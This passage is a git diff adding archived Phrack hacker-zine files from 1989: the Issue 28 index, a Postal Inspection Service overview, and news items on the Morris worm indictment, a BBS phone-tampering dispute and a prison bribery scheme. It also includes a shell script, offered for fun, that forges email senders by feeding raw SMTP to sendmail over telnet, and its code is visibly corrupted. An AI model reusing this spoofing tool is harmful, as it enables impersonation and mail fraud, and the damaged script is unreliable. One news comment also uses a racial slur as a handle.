+This was the reaction of my attempt: "$ PHONE 1084::SYSTEM".  I have not
+answered to this mail.  I AM SICK OF IT!
+
+
+                                   Framstag
+                          (FRAMSTAG@DTUPEV5A.BITNET)
+
+         With Special Thanks For Translation Assistance To Schrulli B.
+_______________________________________________________________________________
diff --git a/phrack27/8.txt b/phrack27/8.txt
new file mode 100644
index 0000000..57900dc
--- /dev/null
+++ b/phrack27/8.txt
@@ -0,0 +1,72 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 27, File 8 of 12
+
+        <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+        <><><><>                                              <><><><>
+        <><><>             Sending Fake Mail In Unix            <><><>
+        <><>                                                      <><>
+        <>                     by Dark OverLord                     <>
+        <><>                                                      <><>
+        <><><>                   May 26, 1989                   <><><>
+        <><><><>                                              <><><><>
+        <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+
+Here is a shell script that can be use to send fakemail from any Unix system.
+Have fun and stay out of trouble.
+
+
+-Dark Overlord
+
+        -=-=-=-=-=-=-=-=-=-=-=-=-=  Cut here -=-=-=-=-=-=-=-=-=-=-=-=-=
+! /bin/sh
+#Mfakemail - A shell script to send fakemail.
+#M##M#Met up the path.
+PATH=/usr/ucb:/bin:$HOME/Bin
+#Marse the command line
+case $ in
+0)echo "USAGE: user@host [ from@somewhere ] [ mailer_host ]" >& 2
+exit 1
+;;
+1)mailto=$1
+from="person@campus"
+mailerhost=localhost
+;;
+2)mailto=$1
+from=$2
+mailerhost=localhost
+;;
+3)mailto=$1
+from=$2
+mailerhost=$3
+;;
+*)echo "USAGE: user@host [ from@somewhere ] [ mailer_host" >& 2
+exit 1
+;;
+esac
+#Mreate a header for sendmail
+cat <<E!O!F!> /tmp/cli$$
+helo $mailerhost
+mail from:$from<$from>
+rcpt to: $mailto <$mailto>
+data
+From: $from
+To: $mailto
+Subject:
+Status: RO
+
+
+E!O!F!
+#Mdit the mailer
+vi /tmp/cli$$
+#M
dd a ending for the mailer
+cat <<E!O!F!>> /tmp/cli$$
+.
+quit
+E!O!F!
+#Monnect to the remote host's sendmail daemon
+telnet $mailerhost smtp < /tmp/cli$$
+#Mlean up time
+/bin/rm -f /tmp/cli$$
+_______________________________________________________________________________
diff --git a/phrack27/9.txt b/phrack27/9.txt
new file mode 100644
index 0000000..242fd89
--- /dev/null
+++ b/phrack27/9.txt
@@ -0,0 +1,276 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 27, File 9 of 12
+
+
+                   +======================================+
+
+                         The Postal Inspection Service
+
+                 (C) UNITED STATES POSTAL SERVICE (U.S. MAIL)
+
+                               Brought to you by
+
+                                   Vendetta
+
+                                 May 10, 1989
+
+                   +======================================+
+
+
+Protecting The U.S. Mails
+~~~~~~~~~~~~~~~~~~~~~~~~~
+The protection of the U.S. Mail and the mail system is the responsibility of
+the Postal Inspection Service.  As the law enforcement and audit arm of the
+U.S. Postal Service, the Inspection Service is a highly specialized,
+professional organization performing investigative, law enforcement, and audit
+functions essential to a stable and sound postal system.
+
+As our country's oldest federal law enforcement agency, the Inspection Service
+has jurisdiction in all criminal matters infringing on the integrity and
+security of the mail, and the safety of all postal valuables, property, and
+personnel.
+
+Since the beginning of a postal system in this country, criminal and
+administrative problems of the Postal Service have been interwoven.  By
+detecting and investigating crimes against the mail and postal revenue,
+establishing safe and efficient postal systems, protecting all postal
+properties, assuring that the postal system is not criminally misused to the
+detriment of the public, the Inspection Service plays an integral part in
+maintaining effective operations in the Postal Service.
+
+The agency's activities make a vital contribution to the protection of the
+nation's economy.  Security and enforcement functions of the Inspection Service
+provide assurance to American business for the safe exchange of funds and
+securities through the U.S. Mail, and to postal customers of the sanctity of
+the seal in transmitting correspondence and messages to all parts of the world.
+Audits ensure stability to financial operations, help control costs, and
+promote increased efficiency in our Postal Service.
+
+
+Postal Inspectors
+~~~~~~~~~~~~~~~~~
+Postal Inspectors are the fact finding and investigative agents of the U.S.
+Postal Service.  Today nearly two-thirds of their time is spent in
+investigating and solving postal related crimes.  Possessing statutory power of
+arrest, they apprehend violators of the law and work closely with U.S.
+Attorneys in prosecuting cases in court.  Their work also includes crime
+prevention, the audit of postal operations, investigation of accidents and a
+wide variety of other service and audit matters.
+
+The work of a Postal Inspector requires total dedication and a willingness to
+work long hours.  Investigations of postal crimes which often entail interstate
+or international coordination, and the responsibility to restore mail service
+following catastrophes such as floods, fire, and airplane wrecks, are
+time-consuming and can be hazardous.
+
+There are approximately 1,900 Postal Inspectors stationed in the United States
+and Puerto Rico.  All trainees undergo an eleven-week basic training course
+involving use of firearms, defensive tactics, legal matters, search and
+seizure, arrest techniques, court procedures, postal operations, audit
+functions, and a detailed study of the federal laws in which the Inspection
+Service has jurisdiction.  Classes are conducted at the Inspection Service
+training center in Potomac, Maryland.
+
+Refresher courses keep Inspectors informed of current court decisions, laws,
+and legal procedures.  Additional specialized courses are continually held to
+equip the Service with expertly trained personnel.
+
+All applicants for the position of Postal Inspector must successfully complete
+the following steps; entry examination; a comprehensive background
+investigation including ma medical examination; the candidate assessment center
+review; and all phases of the basic training course.
+
+
+Inspection Service Activity
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+         Criminal investigations and postal crime prevention represent
+             the greatest portion of Inspection Service activity.
+
+Postal Inspectors investigate violations of all postal laws and other related
+criminal violations.  Crimes within the purview of postal investigations
+include mail fraud, the illegal transmission of controlled substances through
+the U.S. Mail, the mailing of child pornography, thefts of mails or postal
+valuables, assaults on postal employees, bombs sent through the mails or
+directed against postal properties, and the mailing of matter containing
+poison, unauthorized concealable firearms, and harmful or prohibited articles.
+
+Five crime laboratories located throughout the country assist Inspectors in
+analyzing evidentiary material needed for identifying and tracing criminal
+suspects and in providing expert testimony for cases brought to trial.
+
+The objectives of postal crime prevention are to anticipate, identify, and
+analyze those areas of greatest crime risk potentially affecting employees,
+funds, property, and postal customers.  Postal Inspectors then take action to
+remove or reduce that risk and maintain the integrity of the Postal Service.
+
+                "The Postal Inspection Service is responsible
+                for the internal audit of the Postal Service."
+
+Postal Inspectors provide management with independent audits and investigations
+of all postal activities as a part of the Postal Service's internal control
+system.
+
+Audits of installations and systems protect the assets of the Service, improve
+its financial management system, assist in the resolution of customer
+complaints, investigate matters of Congressional interests, and identify
+specific improvements for better customer service and more economical
+operations.
+
+Financial audits provide an independent check on the adequacy and effectiveness
+of control systems; verify the existence of assets and ensure the proper
+safeguards are maintained.  Operations audits are conducted to assist postal
+management in the operation of an efficient, and reliable Postal Service.
+
+
+Security Force
+~~~~~~~~~~~~~~
+Postal Police Officers provide protection to mail, postal valuables, postal
+employees, facilities, and vehicles of the Postal Service.  As part of the law
+enforcement team, they assist Postal Inspectors in the enforcement of certain
+postal laws and regulations on postal premises and provide mobile response
+unites in emergency situations involving the Postal Service.
+
+Equipped with portable radios and alerted by closed circuit television they
+provide perimeter security to major postal facilities and other buildings
+operated by the Postal Service.  Their presence in postal installations
+throughout the country is a deterrent to postal crimes and an aid to employee
+morale.
+
+Postal Police Officers also are used to escort high value mail while in transit
+between postal units and at airports.
+
+Experience in military or civil law enforcement, industrial security, or
+similar occupations is an asset for positions in the Security Force.  All
+appointees undergo a four-week training course conducted at the Inspection
+Service's training center.
+
+
+Coordination With Other Agencies
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The Inspection Service extends full cooperation to all local and federal
+investigative and prosecutive authorities in law enforcement matters to ensure
+greater protection to the public.  Postal Inspectors participate in the
+Department of Justice national strike force teams aimed at curtailing
+widespread criminal acts of an organized nature.  Postal Inspectors also work
+closely with the External Auditors in providing support to the certification of
+the Postal Service's financial statements.
+
+
+Conviction Rate
+~~~~~~~~~~~~~~~
+The Inspection Service maintains a consistently high conviction rate each year
+of approximately 98% of cases brought to trial, a rate not exceeded by any
+other federal law enforcement agency.
+
+
+Jurisdiction, Postal Laws, and Protection
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The Inspection Service exercises investigative jurisdiction over approximately
+85 postal-related statues.  These can be grouped in two categories:  Criminal
+acts against the mails, postal facilities, or postal personnel; and criminal
+misuse of the postal system.
+
+
+MAIL FRAUD
+
+All criminal activity involving use of the U.S. Mail with intent to defraud
+comes under the jurisdiction of the Postal Inspection Service.  The Mail Fraud
+Law is the oldest consumer protection law in the United States and is one of
+the most effective prosecutive tool in fighting white collar and organized
+crime.  Millions of dollars are lost each year through mail fraud which cheats
+not only the poor and the elderly, but businessmen and the consumer as well.
+Prevalent schemes include insurance, banking, false billings; land and
+advance-fee selling swindles; franchise schemes; work-at-home and fraudulent
+diploma schemes; charity schemes; promotions of fake health cures, beauty
+devices, fast-working diets, and sex stimulants; chain letters, lotteries, and
+solicitations for the sale of advertising specialty items.
+
+While Postal Inspectors have no statutory authority to act as intermediaries in
+the settlement of unsatisfactory financial or property transactions conducted
+through the mails, their investigations frequently result in the discontinuance
+of fraudulent or borderline operations.  Administrative mail-stop orders may be
+issued to prevent continuing public loss while sufficient evidence is being
+developed for criminal prosecutive action in the courts, or in cases where
+false representations, but not necessarily fraudulent intent, can be proven.
+The Inspection Service has a leading role in consumer protection through the
+implementation of educational programs designed to prevent mail fraud schemes
+from developing, and through its efforts to resolve complaints relating to
+consumer/vendor misunderstandings or poor business practices.
+
+
+ORGANIZED CRIME
+
+Investigations by Postal Inspectors in organized crime matters most frequently
+relate to cases involving theft and fencing of large amounts of stamp stock and
+securities by organized post office burglary rings; insurance and investment
+frauds; and planned bankruptcies and schemes aimed at looting company assets.
+The Organized Crime Control Act of 1970 specifically includes violation of the
+Mail Fraud Statue as "racketeering activity."  Postal Inspectors are assigned
+to the Justice Department Organized Crime Strike Forces which operate at various
+points throughout the country.
+
+
+MAIL THEFT/BURGLARY/ROBBERY
+
+Investigation of mail theft offenses are a large part of the Inspection
+Service's responsibilities and most commonly involve stolen checks, food
+coupons, or other negotiable securities.  Primary attention is directed at
+major gangs, sophisticated fencing operations, large scale thefts, and the
+implementation of preventive programs.
+
+Burglaries of post offices range from vandalism to high level burglary rings
+and fencing operations involving organized crime activity.
+
+Armed robberies endanger the lives of postal employees and the public and,
+therefore, are priority investigations.  The targets of these crimes usually
+are postal facilities, vehicles transporting mail, and individual employees,
+primarily letter carriers.
+
+
+DRUGS
+
+Illegal trafficking in drugs, narcotics, and other controlled substances
+through the mail is investigated in conjunction with other federal and state
+law enforcement agencies.
+
+
+PORNOGRAPHY
+
+The Inspection Service investigates violations of the Postal Obscenity Statue
+enacted in 1865 which prohibits the sending of obscene materials through the
+U.S. Mail.  This includes the investigation of child pornography offenses
+involving the sexual abuse of exploitation of children based on laws passed in
+1977 and 1984.
+
+
+BOMBS
+
+Investigations of incidents of threats involving bombs and incendiary devices
+sent through the mails or directed at postal properties or functions are within
+the jurisdiction of the Inspection Service.
+
+
+EXTORTION
+
+The Inspection Service has investigative responsibility in incidents involving
+use of the mails to extort money or property by threat of injury to person's
+reputation or by accusing a person of a crime.
+
+
+OTHER PROHIBITED MAILINGS
+
+The mailing of poisons or other harmful matter prohibited by law is
+investigated by Postal Inspectors.
+
+
+Assistance From The Public
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+In most cases, the Inspection Service must rely on the watchfulness and
+alertness of mail recipients to inform them of possible criminal or harmful
+activity involving the use of the mails.  Any suspected violations of postal
+laws or misuse of the mails should be reported to the local Postmaster for
+referral to a Postal Inspector.  Prompt action on the part of postal customers
+and Postal Inspectors is essential in the interest of crime prevention and
+detection.
+_______________________________________________________________________________
diff --git a/phrack28/1.txt b/phrack28/1.txt
new file mode 100644
index 0000000..989da9e
--- /dev/null
+++ b/phrack28/1.txt
@@ -0,0 +1,55 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 28, File #1 of 12
+
+                   Phrack Inc. Newsletter Issue XXVIII Index
+                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                                October 7, 1989
+
+
+     Greetings and welcome to Issue 28 of Phrack Inc.  We really
+must apologize for the lateness of this issue, but sorting
+through all of the files sent in from over the entire summer as
+well as our own real life responsibilities have been keeping us
+both rather busy.
+
+     This issue we feature Phrack World News Special Edition III.
+This file contains the exclusive coverage of SummerCon '89, which
+took place in St. Louis, Missouri on June 22-25, 1989.
+
+     The Future Transcendent Saga continues in this issue with
+part one of a file about TCP/IP.  We also present to you the
+beginning of a new irregular column called Network Miscellany by
+Taran King.  Its exactly what it says it is -- interesting and
+important changes in, and tips about using, the Internet.  It
+will contain different material each issue it is presented in to
+keep pace with the always changing wide area networks.  Speaking
+of irregular columns, Phrack Pro-Phile returns this issue with a
+detailed look at Erik Bloodaxe of LOD.
+
+     As always, we ask that anyone with network access drop us a
+line to either our Bitnet or Internet addresses...
+
+               Taran King                        Knight Lightning
+          C488869@UMCVMB.BITNET                C483307@UMCVMB.BITNET
+       C488869@UMCVMB.MISSOURI.EDU          C483307@UMCVMB.MISSOURI.EDU
+
+And now we can also be reached via our new mail forwarding
+addresses (for those that cannot mail to our Bitnet or Internet
+addresses):
+
+               ...!netsys!phrack      or      phrack@netsys.COM
+_______________________________________________________________________________
+
+Table of Contents:
+
+1.  Phrack Inc. XXVIII Index by Taran King and Knight Lightning
+2.  Phrack Pro-Phile XXVIII on Erik Bloodaxe by Taran King
+3.  Introduction to the Internet Protocols:  Chapter Eight of the FTS by KL
+4.  Network Miscellany by Taran King
+5.  A Real Functioning PEARL BOX Schematic by Dispater
+6.  Snarfing Remote Files by Dark OverLord
+7.  Other Common Carriers; A List By Equal Axis
+8.  Phrack World News Special Edition III (SummerCon '89) by Knight Lightning
+9-12 Phrack World News XXVIII/Parts 1-4 by Knight Lightning
+_______________________________________________________________
diff --git a/phrack28/10.txt b/phrack28/10.txt
new file mode 100644
index 0000000..4306931
--- /dev/null
+++ b/phrack28/10.txt
@@ -0,0 +1,531 @@
+                                ==Phrack Inc.==
+
+                    Volume Three, Issue 28, File #10 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN               Issue XXVIII/Part 2               PWN
+            PWN                                                 PWN
+            PWN                 October 7, 1989                 PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Grand Jury Indicts Student For Crippling Nationwide Computer Network    7/26/89
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by John Markoff (New York Times)
+
+After more than eight months of delay, the Justice Department said Wednesday
+that a federal grand jury in Syracuse, N.Y., had indicted the 24-year-old
+Cornell University graduate student who has been blamed for crippling a
+nationwide computer network with a rogue software program.
+
+The student, Robert Tappan Morris, was charged with a single felony count under
+a 1986 computer crimes law, the Computer Fraud and Abuse Act.  Justice
+Department officials said the indictment was the first under a provision of the
+law that makes it illegal to gain unauthorized access to federal computers.
+
+A spokesman for the Justice Department said Wednesday that the indictment had
+been delayed simply because of the time taken to develop evidence.
+
+But legal experts familiar with the case said the department had been stalled
+in efforts to prosecute Morris because of an internal debate over whether it
+might be impossible to prove the charges.  Under the 1986 law, prosecutors must
+show that Morris intended to cripple the computer network.
+
+As a result of this concern, the U.S. attorney in Syracuse, Frederick J.
+Scullin Jr., had considered a plea bargain in which Morris would have pleaded
+guilty to a misdemeanor charge.  This approach was apparently resisted,
+however, by Scullin's superiors in Washington, who wanted to send a clear
+signal about the seriousness of computer crime.
+
+Three bills now pending before Congress would make it easier than with the 1986
+law to prosecute malicious invasion of computer systems.
+
+The indictment charges that Morris was the author of a computer program that
+swept through a national network composed of more than 60,000 computers
+November 2, 1988 jamming as many as 6,000 machines at universities, research
+centers and military installations.
+
+The software, which computer hackers call a "virus," was supposed to hide
+silently in the computer network, two of Morris' college friends said, but
+because of a programming error it multiplied wildly out of control.  The
+friends said Morris' idea had been to simply to prove that he could bypass the
+security protection of the network.
+
+According to Wednesday's indictment, Morris gained unauthorized access to
+computers at the National Aeronautics and Space Administration's Ames Research
+Center in Moffett Field, California; the U.S. Air Force Logistics Command at
+Wright Patterson Air Force Base in Dayton, Ohio; the University of California
+at Berkeley, and Purdue University.
+
+The indictment charges that the program shut down numerous computers and
+prevented their use.  It charges Morris with causing "substantial damage" at
+many computer centers resulting from the loss of service and the expense
+incurred diagnosing the program.
+
+The felony count carries a maximum penalty of five years in prison and a fine
+of $250,000, in addition to which the convicted person can be ordered to pay
+restitution to those affected by his program.
+
+Morris' lawyer, Thomas A. Guidoboni, said his client intended to plead not
+guilty.  Morris, who now lives in the Boston area, was scheduled to be
+arraigned on Wednesday, August 2, before Gustave J. DiBianco, a U.S. magistrate
+in Syracuse.
+
+Morris' father, Robert, the chief scientist for the National Security Agency,
+said the family planned to stand behind their son.  "We're distressed to hear
+of the indictment," he said.
+
+After realizing that his program had run amok, Morris went to his family home
+in Arnold, Maryland, and later met with Justice Department officials.
+
+The 1986 law was the first broad federal attempt to address the problem of
+computer crime.  Morris is charged with gaining unauthorized access to
+computers, preventing authorized access by others and causing more than $1,000
+in damage.
+
+The incident raised fundamental questions about the security of the nation's
+computers and renewed debate over the who should be responsible for protecting
+the nation's non-military computer systems.
+
+Last year Congress settled a debate between the National Security Agency and
+the National Institute of Standards and Technology by giving authority over
+non-military systems to the civilian agency.
+
+Last week, however, a General Accounting Office report based on an
+investigation of the incident recommended that the Office of Science and
+Technology Policy coordinate the establishment of an interagency group to
+address computer network security.
+
+The incident has also bitterly divided computer scientists and computer
+security experts around the country.  Some have said they believe that "an
+example" should be made of Morris to discourage future tampering with computer
+networks.
+
+Others, however, have argued that Morris performed a valuable service by
+alerting the nation to the laxity of computer security controls.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Other articles about Robert Tappan Morris, Jr. and the Internet Worm are;
+
+"Computer Network Disrupted By 'Virus'"          (11/03/88) PWN XXII  -Part 2
+"Virus Attack"                                   (11/06/88) PWN XXII  -Part 2
+"The Computer Jam:  How It Came About"           (11/08/88) PWN XXII  -Part 2
+"US Is Moving To Restrict {...} Virus"           (11/11/88) PWN XXII  -Part 2 *
+"FBI Studies Possible Charges In Virus"          (11/12/88) PWN XXII  -Part 2
+"Big Guns Take Aim At Virus"                     (11/21/88) PWN XXII  -Part 3
+"Congressman Plan Hearings On Virus"             (11/27/88) PWN XXII  -Part 3
+"Pentagon Severs Military {...} Virus"           (11/30/88) PWN XXII  -Part 3 *
+"Networks Of Computers At Risk From Invaders"    (12/03/88) PWN XXII  -Part 4 *
+"Computer Virus Eradication Act of 1988"         (12/05/88) PWN XXII  -Part 4 *
+"Breaking Into Computers {...}, Pure and Simple" (12/04/88) PWN XXIV  -Part 1 *
+"Cornell Panel Concludes Morris {...} Virus"     (04/06/89) PWN XXVI  -Part 1
+"Robert T. Morris Suspended From Cornell"        (05/25/89) PWN XXVII -Part 2
+"Justice Department Wary In Computer Case"       (05/28/89) PWN XXVII -Part 2
+
+* - Indicates that the article was not directly related to Robert Morris, but
+    did discuss him as well as the Internet Worm incident.
+_______________________________________________________________________________
+
+The Free World Incident                                            July 5, 1989
+~~~~~~~~~~~~~~~~~~~~~~~
+Special Thanks to Brew Associates of Phortune 500
+
+               [Some articles edited for this presentation --KL]
+
+Numb: 84 of 98                7/2/89 at 8:56 pm
+Subj: ...
+Sect: General Messages
+From: Major Havoc
+
+Here is the story...
+
+Evidently, someone got into Chesapeake & Potomac's (C&P) computer systems, and
+added call forwarding to the telephone line that the Free World is being run
+on.  It was not done through social engineering, because there was not an order
+pending on my line.  Therefore, I had "free" call waiting on my line.
+
+What the individual who did this does not realize is that service cannot be
+changed on my line unless it is typical service, because because my father is a
+retired VP from C&P.
+
+The phone lines at this location are paid for by C&P, so the only way that the
+service on these lines could have been changed is directly via the C&P computer
+systems.  I had a long talk with C&P security, and they know who the individual
+was that made the changes in the system.  My parents (since I do not even
+really live here anymore) are supposed to be signing papers that will have this
+individual prosecuted sometime next week, because he was foolish enough to
+leave something for them to track down.
+
+My guess is that it was someone who was denied access to the system that has
+some type of grudge to hold or something.  I will have the pleasure of seeing
+this individual serve time, if they are not a minor.
+
+C&P Security questioned me in person and asked me if I had any information on
+different incidents concerning central office burglaries or theft of C&P
+property.  Some of you may be getting a BIG surprise REAL soon.
+
+The bottom line is that I am not going to put up with this hassle much longer.
+The mere fact that I am under possible investigation for something that I am
+not involved with is really starting to get me upset.  I am 20 years old, and I
+have a nice 32K salary job, and I am not going to tolerate these situations any
+longer.  I have been doing this for so long, that it is about time that I got
+some kind of recognition, and not more grief from a bunch of worthless
+Christmas modemers.
+
+Shape up or pay the consequences.
+
+                                                                -Major Havoc
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Numb: 86 of 98                7/2/89 at 11:54 pm
+Subj: Hmm..
+Sect: General Messages
+From: Weatherman
+
+I would do the same thing.  If some guy thinks he is being really slick and
+does something like that just to cause trouble, they deserve a rude awakening
+to real life.  Keep us posted on the situation.  I can see your point as to
+your job and age and everything since I am in the same boat.  I am not going to
+sacrifice my future life for any reason.  Unfortunately, I don't make 32k yet.
+
+                                                        \%\%eatherman
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Numb: 87 of 98                7/3/89 at 12:07 pm
+Subj: Umm...
+Sect: General Messages
+From: Lost Carrier
+
+Major Havoc -- The only part of your message I am concerned about is "I had a
+long talk with C&P security and a lot of you will be in for a big surpirse," or
+something to that effect.  I hate surprises.  Which of us?     heh.
+
+                                                                LC, 2af
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Numb: 89 of 98                7/3/89 at 4:03 pm
+Subj: ....
+Sect: General Messages
+From: Raving Lunatic
+
+I am shocked.  Major Havoc turning people in?  About time, I guess it takes
+income and responsibilities for most geeks to grow up and I am glad Havoc is not
+going to tolerate it.  Would be interesting to at least hear the alias(es) of
+the people/person that did the forwarding.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Numb: 90 of 98                7/3/89 at 5:03 pm
+Subj: I find this interesting...
+Sect: General Messages
+From: The Mechanic
+
+I have seen Major Havoc post several messages recently (both here [The Free
+World bulletin board] and elsewhere) on the topic of telephone security.  While
+it was not explicitly mentioned, it was implied that some activities discussed
+might not be entirely legal.  In fact, there is a logon message encouraging
+users to post as much as possible, as well as upload and download software,
+including software that may be copyrighted.  Now we see a message from MHavoc
+that some of us may be looking forward to "BIG Surprises."  I do not know about
+you, but I'm going to think twice before I post *anything* to this system, at
+least until I am assured that material on this board is not being monitored by
+C&P personnel.
+
+I think that if MHavoc wants this system to go anywhere, he is going to have to
+*prove* to us that he is not going to be narcing on people as a result of what
+they post.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Numb: 91 of 98                7/3/89 at 5:23 pm
+Subj: ...
+Sect: General Messages
+From: Major Havoc
+
+The information was not supplied by myself.  It was information that was read
+to me by C&P security people.  I stood there plainly denying that I even knew
+what a modem was.
+
+The bottom line is that you do not have to worry about me.  You need to worry
+about the information that they already have.  They merely asked me if I knew
+anything about it.  Of course I did not...seriously, I don't even know.
+
+                                                              -Major Havoc
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Numb: 93 of 98                7/3/89 at 8:29 pm
+Subj: ...
+Sect: General Messages
+From: Juan Valdez
+
+I am sure Major Havoc cannot reveal the name of the person who did it, since he
+is under investigation, it would make matters more difficult to make his name
+public.  I am sure we'd all like to know maybe after everything is all done
+with.  This thing about C&P cracking down scares me.  I know that I have not
+done anything like what you mentioned and I am not connected to anything
+directly as far as I know.  Now you are getting me paranoid.
+
+                                Mike
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+Numb: 94 of 98                7/3/89 at 9:31 pm
+Subj: Hmm...
+Sect: General Messages
+From: Mr. Mystery
+
+When it becomes possible, please post his name, and, more
+importantly, the date of his court appearance.  Might be worth
+watching.
+
+                                                           - MR. MYSTERY
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Numb: 95 of 98                7/3/89 at 11:10 pm
+Subj: That
+Sect: General Messages
+From: The Killer
+
+Is he a local or just an upset user.  What sort of stuff was the
+phone company upset about?  Phreakers or people tampering with
+their equipment?  That is pretty messed up.
+
+So long as my ass is clean, I really hope you get the idiot.  I
+am curious --Is he a phone company employee?  How did he get into
+the system?
+
+[Killer/USAlliance] - FW:301/486-4515
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Numb: 96 of 98                7/4/89 at 2:26 am
+Subj: Things.........
+Sect: General Messages
+From: Hellraiser
+
+Would I be correct to assume that this board is completely
+"private."  At any rate, I would be interested in knowing who
+this person causing the disturbance is/was (drop a hint).
+
+
+Numb: 97 of 98                7/4/89 at 6:33 pm
+Subj: Jesus...
+Sect: General Messages
+From: The Disk Jockey
+
+Geez... Someone learns a few LMOS commands and they seem obsessed
+with doing stupid things.
+
+I have absolutely no idea why people would act wary towards
+Havoc, I am sure that I and anyone else who ran a board would,
+given the chance, burn the person disrupting the system.  What
+the hell did you think?  Havoc should just let it slide?  I think
+not.  People like that (doers of such cute call forwarding
+things) should be screwed.  They are the people that give you a
+bad reputation.
+
+                                                       -The Disk Jockey
+
+I hope he gets nailed, I just find it hard to believe that he
+left any information that could lead back to him, as someone who
+was at least smart enough to get into an LMOS or equivalent could
+have at least some common sense, but I suppose his acts dictate
+otherwise.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Numb: 98 of 98                7/4/89 at 7:21 pm
+Subj: Well...
+Sect: General Messages
+From: Microchip
+
+When it was on interchat, it said Major Havoc was fed up and it
+was going to do this until we all calmed down
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+For those who never found out, the perpetrator of the call
+forwarding was none other than SuperNigger (who is also
+responsible for crashing Black Ice).  There never was any solid
+proof that could be used and any comments about him leaving a
+trail to follow back to him were bluffs. -KL
+_______________________________________________________________________________
+
+Conman Loses Prison Phone Privileges                         September 23, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+About a year ago there was a plot to steal $69 million from the
+First National Bank of Chicago through a fraudulent wire-transfer
+scheme masterminded by a man named Armand Moore.  Using the
+telephone and a computer -- the tools of his trade, Mr. Moore
+planned to transfer money from the accounts of corporate
+customers at First National to his account in Switzerland.
+
+He needed some inside help to bring it off, and he found two
+young guys in the wire transfer room at the bank who were willing
+to help.  Both of the clerks were fellows in their early
+twenties, who had worked for the bank a couple years each.  Both
+had come from families living in a ghetto neighborhood on the
+south side of Chicago; but their families had raised them to be
+honest.  Both had been average high school students; neither had
+any previous criminal record of any sort; both had been given a
+break by an employer who treated them fairly and allowed them to
+rise to positions of trust:  handling huge sums of money --about
+a hundred million dollars a day -- in the wire-transfer unit at
+the bank.  Both showed great promise; then Armand Moore came
+along.
+
+Moore wined and dined these two kids; showed them the best of
+times and what it was like to have a fancy apartment in a wealthy
+neighborhood instead of living with your parents in an inner-city
+ghetto.  Its not that they weren't guilty --after all, they did
+provide the secret passwords and phrases which bank employees say
+to one another on the telephone, and they did press the buttons
+which sent $69 million dollars on its way to Europe -- but they
+would not have done it if Armand Moore had not been there.
+
+So instead of a career at the bank, the guys exchanged it for an
+indictment for bank fraud; loss of their jobs; humiliation for
+themselves and their families; and the right to say "convicted of
+bank fraud" on future job applications.  Naturally, they are
+blacklisted in the banking and computer industries for the rest
+of their lives.  One of the guys said Armand had promised to give
+him money to buy his mother a new coat.
+
+The job at First National was bungled as we all know, two young
+guys had their lives ruined, and the court took all this into
+consideration when Armand Moore was sentenced to ten years in
+prison last June.  But as Paul Harvey would say, "...then there
+is the rest of the story...."
+
+It seems Armand Moore was no stranger to bank fraud.  He had
+previously pulled a couple of smaller jobs, using a telephone and
+a computer to net about a million dollars from two banks in the
+Detroit area.  The FBI had not previously connected him with
+those jobs.  He had this money stashed away, waiting for him when
+he got released from prison, which in this latest scheme, would
+be a lot sooner than the government expected.
+
+Mr. Moore is the sort of fellow who could sell the proverbial
+ice-box to an Eskimo... or a newspaper subscription to a blind
+man... he can get anybody to do anything it seems... by flirting
+with them, showering them with attention, and if necessary, just
+bribing them.  Now two more lives have been ruined by Armand
+Moore, and his only regret is he got caught.
+
+Since his trial in June, Armand Moore has been a guest of the
+government at the federal penitentiary in downtown Chicago.  As a
+long term resident, he's gotten to know a lot of the folks,
+including the employees of the prison.  In particular, he got to
+be very good friends with Randy W. Glass, age 28, an employee of
+the prison in the computer facility there.  Glass' duties include
+entering data into the prison computer about the inmates, their
+sentences and other data.  Oh... is the story becoming clearer
+now?
+
+Glass and his wife live in Harvey, IL, a middle class suburb on
+the south side of Chicago.  It seems like so many other people
+who meet Armand Moore, Glass enjoyed the company of this older,
+very sophisticated and friendly chap.  After several meetings in
+the past three months, Glass was finally seduced by Moore's
+money, like everyone else who meets him.  That, plus his pleasant
+manners, his smooth conversation and his assurance that nothing
+could go wrong led to Glass finally agreeing to accept a $70,000
+bribe in exchange for punching a few buttons on the computer to
+show Armand Moore's sentence was complete; him and a couple other
+inmates who were sharing the same room at the prison.  Just
+change a few details, punch a few buttons -- and to be on the
+safe side, do it from home with your modem and terminal, using
